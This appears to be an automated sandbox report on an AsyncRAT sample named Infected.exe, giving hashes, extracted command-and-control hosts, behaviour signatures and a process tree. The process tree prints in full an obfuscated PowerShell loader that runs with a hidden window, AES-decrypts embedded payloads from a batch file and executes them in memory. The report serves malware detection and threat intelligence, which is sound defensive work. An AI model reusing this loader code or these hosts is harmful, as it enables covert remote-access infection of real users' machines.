Analysis
-
max time kernel
15s -
max time network
17s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
04-12-2024 03:36
Static task
static1
Behavioral task
behavioral1
Sample
Infected.exe
Resource
win7-20241023-en
General
-
Target
Infected.exe
-
Size
640KB
-
MD5
1584a5810de6bfc7c3dff164710e0138
-
SHA1
e9923c7954ff83bb2bc82e04ee9857adcdfc23eb
-
SHA256
f119af94e527030335c30655a23723fc9d62b8ea854968245add5237789bd766
-
SHA512
07267af21244580cdeb22163c7bb25852f65454e36f6668123d003f60cb31338b4888cb9b849e8959b5509ee659a7128f1e896ea7a8d995d7a79a15a3f4b8d04
-
SSDEEP
12288:xyveQB/fTHIGaPkKEYzURNAwbAgB2X+t4vBQX/g+mFaaj22:xuDXTIGaPhEYzUzA0/0vBbjT
Malware Config
Extracted
asyncrat
Default
127.0.0.1:37754
tcp://nasdnasnd-55496.portmap.host:55496:37754
tcp://nasdnasnd-55496.portmap.host:37754
floor-getting.gl.at.ply.gg:37754
-
delay
1
-
install
false
-
install_folder
%AppData%
Signatures
-
Asyncrat family
-
Async RAT payload 1 IoCs
resource yara_rule behavioral2/memory/628-20-0x00000228382B0000-0x00000228382C6000-memory.dmp family_asyncrat -
Blocklisted process makes network request 1 IoCs
flow pid Process 17 628 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 628 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation Infected.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 628 powershell.exe 628 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 628 powershell.exe -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 2384 wrote to memory of 3124 2384 Infected.exe 83 PID 2384 wrote to memory of 3124 2384 Infected.exe 83 PID 3124 wrote to memory of 628 3124 cmd.exe 87 PID 3124 wrote to memory of 628 3124 cmd.exe 87
Processes
-
C:\Users\Admin\AppData\Local\Temp\Infected.exe"C:\Users\Admin\AppData\Local\Temp\Infected.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2384 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\Infected.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:3124 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('k21Z0aGUmMIa82IH1ZHeakFarTsTBsN9aHQ4zh1WaQY='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('cFGhOEILDflSnp/72Cr7AQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $zliPF=New-Object System.IO.MemoryStream(,$param_var); $vxPUW=New-Object System.IO.MemoryStream; $pUYGl=New-Object System.IO.Compression.GZipStream($zliPF, [IO.Compression.CompressionMode]::Decompress); $pUYGl.CopyTo($vxPUW); $pUYGl.Dispose(); $zliPF.Dispose(); $vxPUW.Dispose(); $vxPUW.ToArray();}function execute_function($param_var,$param2_var){ $pmQKt=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $KfoWt=$pmQKt.EntryPoint; $KfoWt.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\RarSFX0\Infected.bat';$Momfr=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\RarSFX0\Infected.bat').Split([Environment]::NewLine);foreach ($sSjTe in $Momfr) { if ($sSjTe.StartsWith(':: ')) { $JyJLj=$sSjTe.Substring(3); break; }}$payloads_var=[string[]]$JyJLj.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:628
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
277KB
MD5bd6d363ffe7f471468e77ac9caf6c587
SHA163f009bd193280e9ea37cd37f286df1770b938dc
SHA256149c1db4bc6f8593ec403d1a7a832de4ed1959f50a47c89a1317bdfec5f08a8c
SHA512621d270910826f90776440a73979b77bc8bc50e7946ed73feef9f2c86efa9af8e8f758bf39cd096e4acebaf068c80fd369a793d23c45de635bacd52802496f1a
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82